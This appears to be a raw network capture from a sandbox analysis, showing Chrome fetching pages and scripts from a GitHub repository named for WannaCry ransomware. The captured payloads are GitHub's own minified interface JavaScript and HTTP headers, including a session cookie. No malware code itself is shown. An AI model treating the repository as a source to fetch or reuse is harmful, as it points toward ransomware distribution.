                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 64 22 2c 63 68 69 6c 64 72 65 6e 3a 22 67 69 74 68 75 62 44 65 73 6b 74 6f 70 22 3d 3d 3d 68 3f 28 30 2c 69 2e 6a 73 78 29 28 65 72 2c 7b 70 6c 61 74 66 6f 72 6d 3a 22 47 69 74 48 75 62 20 44 65 73 6b 74 6f 70 22 2c 68 72 65 66 3a 22 68 74 74 70 73 3a 2f 2f 64 65 73 6b 74 6f 70 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 22 7d 29 3a 22 76 69 73 75 61 6c 53 74 75 64 69 6f 22 3d 3d 3d 68 3f 28 30 2c 69 2e 6a 73 78 29 28 65 72 2c 7b 70 6c 61 74 66 6f 72 6d 3a 22 56 69 73 75 61 6c 20 53 74 75 64 69 6f 22 7d 29 3a 22 78 63 6f 64 65 22 3d 3d 3d 68 3f 28 30 2c 69 2e 6a 73 78 29 28 65 72 2c 7b 70 6c 61 74 66 6f 72 6d 3a 22 58 63 6f 64 65 22 2c 68 72 65 66 3a 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 2e 61 70 70 6c 65 2e 63 6f 6d 2f 78 63 6f 64 65 2f 22 7d 29
                                                                                      Data Ascii: d",children:"githubDesktop"===h?(0,i.jsx)(er,{platform:"GitHub Desktop",href:"https://desktop.github.com/"}):"visualStudio"===h?(0,i.jsx)(er,{platform:"Visual Studio"}):"xcode"===h?(0,i.jsx)(er,{platform:"Xcode",href:"https://developer.apple.com/xcode/"})
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 35 34 34 70 78 29 22 3a 7b 64 69 73 70 6c 61 79 3a 22 6e 6f 6e 65 22 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 5a 2e 43 6f 64 65 49 63 6f 6e 2c 7b 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 7b 70 61 79 6c 6f 61 64 3a 65 2c 73 65 74 4f 70 65 6e 69 6e 67 50 6c 61 74 66 6f 72 6d 3a 74 2c 61 63 74 69 76 65 4c 6f 63 61 6c 54 61 62 3a 72 2c 73 65 74 41 63 74 69 76 65 4c 6f 63 61 6c 54 61 62 3a 6e 7d 29 7b 6c 65 74 7b 68 65 6c 70 55 72 6c 3a 73 7d 3d 28 30 2c 66 2e 4f 75 29 28 29 2c 7b 68 74 74 70 41 76 61 69 6c 61 62 6c 65 3a 61 2c 73 73 68 41 76 61 69 6c 61 62 6c 65 3a 6c 2c 68 74 74 70 55 72 6c 3a 63 2c 73 68 6f 77 43 6c 6f 6e 65 57 61 72 6e 69 6e 67 3a 64 2c 73 73 68 55 72
                                                                                      Data Ascii: n and (max-width: 544px)":{display:"none"}},children:(0,i.jsx)(Z.CodeIcon,{})})}function ee({payload:e,setOpeningPlatform:t,activeLocalTab:r,setActiveLocalTab:n}){let{helpUrl:s}=(0,f.Ou)(),{httpAvailable:a,sshAvailable:l,httpUrl:c,showCloneWarning:d,sshUr
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2c 70 78 3a 30 7d 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 22 52 65 6d 6f 74 65 20 55 52 4c 20 73 65 6c 65 63 74 6f 72 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 61 26 26 28 30 2c 69 2e 6a 73 78 29 28 51 2e 4a 2e 49 74 65 6d 2c 7b 22 61 72 69 61 2d 63 75 72 72 65 6e 74 22 3a 22 68 74 74 70 22 3d 3d 3d 72 3f 22 70 61 67 65 22 3a 76 6f 69 64 20 30 2c 73 78 3a 7b 66 6f 6e 74 57 65 69 67 68 74 3a 22 62 6f 6c 64 22 7d 2c 6f 6e 43 6c 69 63 6b 3a 65 3d 3e 7b 50 28 22 68 74 74 70 22 29 2c 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 22 48 54 54 50 53 22 7d 29 2c 6c 26 26 28 30 2c 69 2e 6a 73 78 29 28 51 2e 4a 2e 49 74 65 6d 2c 7b 22 61 72 69 61 2d 63 75 72 72 65 6e 74 22 3a 22 73 73 68 22 3d 3d 3d 72 3f 22 70 61 67 65 22 3a 76
                                                                                      Data Ascii: ,px:0},"aria-label":"Remote URL selector",children:[a&&(0,i.jsx)(Q.J.Item,{"aria-current":"http"===r?"page":void 0,sx:{fontWeight:"bold"},onClick:e=>{P("http"),e.preventDefault()},children:"HTTPS"}),l&&(0,i.jsx)(Q.J.Item,{"aria-current":"ssh"===r?"page":v
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 74 68 65 20 47 69 74 48 75 62 20 43 4c 49 22 2c 63 68 69 6c 64 72 65 6e 3a 22 4c 65 61 72 6e 20 6d 6f 72 65 22 7d 29 5d 7d 29 5d 7d 29 7d 29 5d 7d 29 2c 28 30 2c 69 2e 6a 73 78 73 29 28 41 2e 53 2c 7b 73 78 3a 7b 70 79 3a 30 2c 6c 69 3a 7b 6d 78 3a 30 2c 77 69 64 74 68 3a 22 31 30 30 25 22 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 53 26 26 28 30 2c 69 2e 6a 73 78 73 29 28 41 2e 53 2e 49 74 65 6d 2c 7b 6f 6e 43 6c 69 63 6b 3a 28 29 3d 3e 7b 74 28 22 67 69 74 68 75 62 44 65 73 6b 74 6f 70 22 29 2c 6b 28 76 29 7d 2c 73 78 3a 43 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 69 2e 6a 73 78 29 28 41 2e 53 2e 4c 65 61 64 69 6e 67 56 69 73 75 61 6c 2c 7b 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 5a 2e 44 65 73 6b 74 6f 70 44 6f 77 6e 6c 6f 61 64 49 63 6f
                                                                                      Data Ascii: the GitHub CLI",children:"Learn more"})]})]})})]}),(0,i.jsxs)(A.S,{sx:{py:0,li:{mx:0,width:"100%"}},children:[S&&(0,i.jsxs)(A.S.Item,{onClick:()=>{t("githubDesktop"),k(v)},sx:C,children:[(0,i.jsx)(A.S.LeadingVisual,{children:(0,i.jsx)(Z.DesktopDownloadIco
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 6e 20 65 6e 28 7b 75 72 6c 3a 65 7d 29 7b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 73 29 28 4e 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 68 65 69 67 68 74 3a 22 33 32 70 78 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 69 2e 6a 73 78 29 28 22 69 6e 70 75 74 22 2c 7b 74 79 70 65 3a 22 74 65 78 74 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 20 69 6e 70 75 74 2d 6d 6f 6e 6f 73 70 61 63 65 20 69 6e 70 75 74 2d 73 6d 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 22 2c 22 64 61 74 61 2d 61 75 74 6f 73 65 6c 65 63 74 22 3a 21 30 2c 76 61 6c 75 65 3a 65 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 65 2c 72 65 61 64 4f 6e 6c 79 3a 21 30 2c 73 74 79 6c 65 3a 7b 66 6c 65 78 47 72 6f 77 3a 31 7d 7d 29 2c 28
                                                                                      Data Ascii: n en({url:e}){return(0,i.jsxs)(N.Z,{sx:{display:"flex",height:"32px"},children:[(0,i.jsx)("input",{type:"text",className:"form-control input-monospace input-sm color-bg-subtle","data-autoselect":!0,value:e,"aria-label":e,readOnly:!0,style:{flexGrow:1}}),(
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 28 6e 75 6c 6c 29 2c 67 3d 28 30 2c 6c 2e 48 29 28 29 2c 7b 72 65 66 49 6e 66 6f 3a 77 7d 3d 28 30 2c 66 2e 42 72 29 28 29 3b 28 30 2c 6f 2e 75 73 65 45 66 66 65 63 74 29 28 28 29 3d 3e 7b 65 3f 2e 6c 65 6e 67 74 68 26 26 28 30 2c 65 6c 2e 71 50 29 28 22 6f 76 65 72 76 69 65 77 2d 72 65 70 6f 2d 66 69 6c 65 73 22 2c 7b 22 66 69 6c 65 2d 63 6f 75 6e 74 22 3a 65 2e 6c 65 6e 67 74 68 2c 22 74 69 6d 65 64 2d 6f 75 74 22 3a 65 2e 73 6f 6d 65 28 65 3d 3e 65 2e 74 69 6d 65 64 4f 75 74 29 2c 22 70 72 6f 63 65 73 73 69 6e 67 2d 74 69 6d 65 22 3a 6e 7d 29 7d 2c 5b 65 2c 6e 5d 29 2c 28 30 2c 6f 2e 75 73 65 45 66 66 65 63 74 29 28 28 29 3d 3e 7b 6c 65 74 20 74 3d 61 73 79 6e 63 28 29 3d 3e 7b 6c 65 74 20 65 3d 28 30 2c 53 2e 51 69 29 28 7b 72 65 70 6f 3a 67 2c 61 63
                                                                                      Data Ascii: (null),g=(0,l.H)(),{refInfo:w}=(0,f.Br)();(0,o.useEffect)(()=>{e?.length&&(0,el.qP)("overview-repo-files",{"file-count":e.length,"timed-out":e.some(e=>e.timedOut),"processing-time":n})},[e,n]),(0,o.useEffect)(()=>{let t=async()=>{let e=(0,S.Qi)({repo:g,ac
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 45 3d 28 30 2c 6f 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 65 2c 74 29 3d 3e 7b 69 66 28 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 79 3d 3d 3d 74 29 72 65 74 75 72 6e 3b 76 28 74 29 3b 6c 65 74 20 72 3d 60 24 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 7d 2f 2f 24 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 7d 24 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 7d 3f 74 61 62 3d 24 7b 74 7d 60 3b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 68 69 73 74 6f 72 79 2e 73 74 61 74 65 2c 22 22 2c 72 29 7d 2c 5b 79 5d 29 3b 69 66 28 21 75 26 26 21 68 26 26 21 70 2e 6c 65 6e 67 74 68 26 26 21 6d 26 26 21 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65
                                                                                      Data Ascii: E=(0,o.useCallback)((e,t)=>{if(e.preventDefault(),y===t)return;v(t);let r=`${window.location.protocol}//${window.location.host}${window.location.pathname}?tab=${t}`;history.replaceState(history.state,"",r)},[y]);if(!u&&!h&&!p.length&&!m&&!t)return null;le


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      115192.168.2.1649821185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC672OUTGET /assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-878844713bc9.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: no-cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:28 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 12386
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 24 Oct 2023 17:57:36 GMT
                                                                                      ETag: 0x8DBD4BAB47FF086
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Age: 2083584
                                                                                      X-Served-By: cache-iad-kiad7000116-IAD, cache-lga21983-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 1905, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: af10ca7a9cb3d9bfe1a66f7ee456064b482827e9
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 76 69 72 74 75 61 6c 69 7a 65 64 2d 6c 69 73 74 5f 65 73 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 74 65 6d 70 6c 61 74 65 2d 70 61 72 74 73 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 22 5d 2c 7b 36 35 37 30 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 6e 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 73 7d 29 3b 76 61 72 20 69 3d 6e 28 33 39 34 39 32 29 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 6e
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js"],{6570:(t,e,n)=>{n.d(e,{Z:()=>s});var i=n(39492),o=function(){function t(e){var n
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 69 7a 65 41 6e 64 50 6f 73 69 74 69 6f 6e 4f 66 4c 61 73 74 4d 65 61 73 75 72 65 64 49 74 65 6d 28 29 3b 72 65 74 75 72 6e 20 74 2e 6f 66 66 73 65 74 2b 74 2e 73 69 7a 65 2b 28 74 68 69 73 2e 5f 69 74 65 6d 43 6f 75 6e 74 2d 74 68 69 73 2e 5f 6c 61 73 74 4d 65 61 73 75 72 65 64 49 6e 64 65 78 2d 31 29 2a 74 68 69 73 2e 5f 65 73 74 69 6d 61 74 65 64 49 74 65 6d 53 69 7a 65 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 55 70 64 61 74 65 64 4f 66 66 73 65 74 46 6f 72 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2e 61 6c 69 67 6e 2c 6e 3d 74 2e 63 6f 6e 74 61 69 6e 65 72 53 69 7a 65 2c 69 3d 74 2e 74 61 72 67 65 74 49 6e 64 65 78 3b 69 66 28 6e 3c 3d 30 29 72 65 74 75 72 6e 20 30 3b 76 61 72 20 6f 3d 74 68 69 73 2e 67 65 74
                                                                                      Data Ascii: izeAndPositionOfLastMeasuredItem();return t.offset+t.size+(this._itemCount-this._lastMeasuredIndex-1)*this._estimatedItemSize},t.prototype.getUpdatedOffsetForIndex=function(t){var e=t.align,n=t.containerSize,i=t.targetIndex;if(n<=0)return 0;var o=this.get
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 2d 31 29 2c 6c 6f 77 3a 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 2f 32 29 2c 6f 66 66 73 65 74 3a 6e 7d 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 66 69 6e 64 4e 65 61 72 65 73 74 49 74 65 6d 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 69 73 4e 61 4e 28 74 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 49 6e 76 61 6c 69 64 20 6f 66 66 73 65 74 20 22 2b 74 2b 22 20 73 70 65 63 69 66 69 65 64 22 29 3b 74 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 74 29 3b 76 61 72 20 65 3d 74 68 69 73 2e 67 65 74 53 69 7a 65 41 6e 64 50 6f 73 69 74 69 6f 6e 4f 66 4c 61 73 74 4d 65 61 73 75 72 65 64 49 74 65 6d 28 29 2c 6e 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 74 68 69 73 2e 5f 6c 61 73 74 4d 65 61 73 75 72 65 64 49 6e 64 65 78 29 3b 72 65 74 75 72 6e 20 65 2e 6f 66 66 73 65 74 3e
                                                                                      Data Ascii: -1),low:Math.floor(e/2),offset:n})},t.prototype._findNearestItem=function(t){if(isNaN(t))throw Error("Invalid offset "+t+" specified");t=Math.max(0,t);var e=this.getSizeAndPositionOfLastMeasuredItem(),n=Math.max(0,this._lastMeasuredIndex);return e.offset>
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 72 26 26 28 74 2e 63 6f 6e 74 61 69 6e 65 72 2e 73 63 72 6f 6c 6c 54 6f 70 3d 72 29 2c 74 2e 63 6f 6e 74 61 69 6e 65 72 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 63 72 6f 6c 6c 22 2c 74 2e 68 61 6e 64 6c 65 53 63 72 6f 6c 6c 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 6e 28 29 7d 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 6e 69 74 69 61 6c 69 7a 65 53 69 7a 65 41 6e 64 50 6f 73 69 74 69 6f 6e 4d 61 6e 61 67 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 5f 73 69 7a 65 41 6e 64 50 6f 73 69 74 69 6f 6e 4d 61 6e 61 67 65 72 3d 6e 65 77 20 6f 28 7b 69 74 65 6d 43 6f 75 6e 74 3a 74 2c 69 74 65 6d 53 69 7a 65 47 65 74 74 65 72 3a 74 68 69 73 2e 67 65 74 52 6f 77 48
                                                                                      Data Ascii: unction(){r&&(t.container.scrollTop=r),t.container.addEventListener("scroll",t.handleScroll),"function"==typeof n&&n()})},t.prototype._initializeSizeAndPositionManager=function(t){this._sizeAndPositionManager=new o({itemCount:t,itemSizeGetter:this.getRowH
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 70 72 6f 74 6f 74 79 70 65 2e 72 65 6e 64 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 65 3d 74 2e 6f 76 65 72 73 63 61 6e 43 6f 75 6e 74 2c 6e 3d 74 2e 72 65 6e 64 65 72 52 6f 77 2c 6f 3d 74 68 69 73 2e 73 74 61 74 65 2c 73 3d 6f 2e 68 65 69 67 68 74 2c 72 3d 6f 2e 6f 66 66 73 65 74 2c 61 3d 74 68 69 73 2e 5f 73 69 7a 65 41 6e 64 50 6f 73 69 74 69 6f 6e 4d 61 6e 61 67 65 72 2e 67 65 74 56 69 73 69 62 6c 65 52 61 6e 67 65 28 7b 63 6f 6e 74 61 69 6e 65 72 53 69 7a 65 3a 73 2c 6f 66 66 73 65 74 3a 76 6f 69 64 20 30 3d 3d 3d 72 3f 30 3a 72 2c 6f 76 65 72 73 63 61 6e 43 6f 75 6e 74 3a 65 7d 29 2c 68 3d 61 2e 73 74 61 72 74 2c 6c 3d 61 2e 73 74 6f 70 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65
                                                                                      Data Ascii: prototype.render=function(){for(var t=this.options,e=t.overscanCount,n=t.renderRow,o=this.state,s=o.height,r=o.offset,a=this._sizeAndPositionManager.getVisibleRange({containerSize:s,offset:void 0===r?0:r,overscanCount:e}),h=a.start,l=a.stop,d=document.cre
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 3d 68 3f 30 3a 68 2c 64 3d 6f 2e 74 68 72 65 73 68 6f 6c 64 2c 75 3d 76 6f 69 64 20 30 3d 3d 3d 64 3f 31 35 3a 64 3b 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 69 73 52 6f 77 4c 6f 61 64 65 64 2c 6e 3d 74 2e 6d 69 6e 69 6d 75 6d 42 61 74 63 68 53 69 7a 65 2c 69 3d 74 2e 72 6f 77 43 6f 75 6e 74 2c 6f 3d 74 2e 73 74 61 72 74 49 6e 64 65 78 2c 73 3d 74 2e 73 74 6f 70 49 6e 64 65 78 2c 72 3d 5b 5d 2c 61 3d 6e 75 6c 6c 2c 68 3d 6e 75 6c 6c 2c 6c 3d 6f 3b 6c 3c 3d 73 3b 6c 2b 2b 29 65 28 6c 29 3f 6e 75 6c 6c 21 3d 3d 68 26 26 28 72 2e 70 75 73 68 28 7b 73 74 61 72 74 49 6e 64 65 78 3a 61 2c 73 74 6f 70 49 6e 64 65 78 3a 68 7d 29 2c 61 3d 68 3d 6e 75 6c 6c 29 3a 28 68 3d 6c 2c 6e 75 6c 6c 3d 3d 3d 61 26 26 28 61 3d 6c 29 29 3b 69
                                                                                      Data Ascii: =h?0:h,d=o.threshold,u=void 0===d?15:d;(function(t){for(var e=t.isRowLoaded,n=t.minimumBatchSize,i=t.rowCount,o=t.startIndex,s=t.stopIndex,r=[],a=null,h=null,l=o;l<=s;l++)e(l)?null!==h&&(r.push({startIndex:a,stopIndex:h}),a=h=null):(h=l,null===a&&(a=l));i
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 28 74 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 74 74 65 6d 70 74 65 64 20 74 6f 20 73 65 74 20 70 72 69 76 61 74 65 20 66 69 65 6c 64 20 6f 6e 20 6e 6f 6e 2d 69 6e 73 74 61 6e 63 65 22 29 3b 72 65 74 75 72 6e 20 65 2e 73 65 74 28 74 2c 6e 29 2c 6e 7d 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 21 65 2e 68 61 73 28 74 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 74 74 65 6d 70 74 65 64 20 74 6f 20 67 65 74 20 70 72 69 76 61 74 65 20 66 69 65 6c 64 20 6f 6e 20 6e 6f 6e 2d 69 6e 73 74 61 6e 63 65 22 29 3b 72 65 74 75 72 6e 20 65 2e 67 65 74 28 74 29 7d 3b 6c 65 74 20 41 74 74 72 69 62 75 74 65 54 65 6d 70 6c 61 74 65 50 61 72 74 3d 63 6c 61 73 73 20 41 74 74 72 69 62 75 74 65 54 65 6d 70 6c 61 74 65 50 61 72
                                                                                      Data Ascii: (t))throw TypeError("attempted to set private field on non-instance");return e.set(t,n),n},d=function(t,e){if(!e.has(t))throw TypeError("attempted to get private field on non-instance");return e.get(t)};let AttributeTemplatePart=class AttributeTemplatePar
                                                                                      2024-03-23 14:47:28 UTC1378INData Raw: 20 75 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 69 66 28 21 65 2e 68 61 73 28 74 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 74 74 65 6d 70 74 65 64 20 74 6f 20 73 65 74 20 70 72 69 76 61 74 65 20 66 69 65 6c 64 20 6f 6e 20 6e 6f 6e 2d 69 6e 73 74 61 6e 63 65 22 29 3b 72 65 74 75 72 6e 20 65 2e 73 65 74 28 74 2c 6e 29 2c 6e 7d 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 21 65 2e 68 61 73 28 74 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 61 74 74 65 6d 70 74 65 64 20 74 6f 20 67 65 74 20 70 72 69 76 61 74 65 20 66 69 65 6c 64 20 6f 6e 20 6e 6f 6e 2d 69 6e 73 74 61 6e 63 65 22 29 3b 72 65 74 75 72 6e 20 65 2e 67 65 74 28 74 29 7d 3b 6c 65 74 20 4e 6f 64 65 54 65 6d 70 6c 61 74 65 50 61 72 74 3d 63 6c 61
                                                                                      Data Ascii: u=function(t,e,n){if(!e.has(t))throw TypeError("attempted to set private field on non-instance");return e.set(t,n),n},p=function(t,e){if(!e.has(t))throw TypeError("attempted to get private field on non-instance");return e.get(t)};let NodeTemplatePart=cla
                                                                                      2024-03-23 14:47:28 UTC1362INData Raw: 64 20 74 6f 20 67 65 74 20 70 72 69 76 61 74 65 20 66 69 65 6c 64 20 6f 6e 20 6e 6f 6e 2d 69 6e 73 74 61 6e 63 65 22 29 3b 72 65 74 75 72 6e 20 65 2e 67 65 74 28 74 29 7d 3b 6c 65 74 20 54 65 6d 70 6c 61 74 65 49 6e 73 74 61 6e 63 65 3d 63 6c 61 73 73 20 54 65 6d 70 6c 61 74 65 49 6e 73 74 61 6e 63 65 20 65 78 74 65 6e 64 73 20 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 2c 65 2c 6e 3d 6d 29 7b 76 61 72 20 6f 2c 73 3b 73 75 70 65 72 28 29 2c 61 2e 73 65 74 28 74 68 69 73 2c 76 6f 69 64 20 30 29 2c 68 2e 73 65 74 28 74 68 69 73 2c 76 6f 69 64 20 30 29 2c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 68 69 73 21 3d 3d 54 65 6d 70 6c 61 74 65 49 6e 73 74 61 6e 63 65 2e 70 72 6f 74 6f 74 79
                                                                                      Data Ascii: d to get private field on non-instance");return e.get(t)};let TemplateInstance=class TemplateInstance extends DocumentFragment{constructor(t,e,n=m){var o,s;super(),a.set(this,void 0),h.set(this,void 0),Object.getPrototypeOf(this!==TemplateInstance.prototy


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      116192.168.2.1649823140.82.114.44436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:27 UTC1145OUTGET /chronosmiki/RANSOMWARE-WANNACRY-2.0/spoofed_commit_check/2445abd45c99c3ad9611ebcacc6cfe28451c2c0d HTTP/1.1
                                                                                      Host: github.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Accept: text/html
                                                                                      X-Requested-With: XMLHttpRequest
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Sec-Fetch-Site: same-origin
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Cookie: _gh_sess=Nh9kyBmEE4ZRM3VGYju9KXV5%2Bst%2FyNrmAKbX9XCtLw1boKgTs3auGGqaIH2vBFV5j3AApO%2B1ujV8H4DwCd63S09sYgnwqfIDP4bDBt0oD0D5NRasrQlv1x%2FTwFt3XLSyC6gMF2JYJzrL%2FJJghpMTpYJdsF7ey87SZHLgIArUwuB1VP7xgtzq0eOdKVJrPdKofZjFHialVn%2FYoFOn56rsHoYl04bCkg4Dch7DkCNR2AIkFD6d3919E%2BqyHufe5p93xu4JnFLMiu6pSmtVVvBTWQ%3D%3D--Si1lecK3LCVxv8U%2F--b%2B%2B%2BNLjOSr%2FJwqbiryqGZA%3D%3D; _octo=GH1.1.1358786087.1711205240; logged_in=no; preferred_color_mode=light; tz=Europe%2FZurich
                                                                                      2024-03-23 14:47:28 UTC506INHTTP/1.1 200 OK
                                                                                      Server: GitHub.com
                                                                                      Date: Sat, 23 Mar 2024 14:47:28 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                      ETag: W/"75a11da44c802486bc6f65640aa48a73"
                                                                                      Cache-Control: max-age=0, private, must-revalidate
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                      X-Frame-Options: deny
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 0
                                                                                      Referrer-Policy: no-referrer-when-downgrade
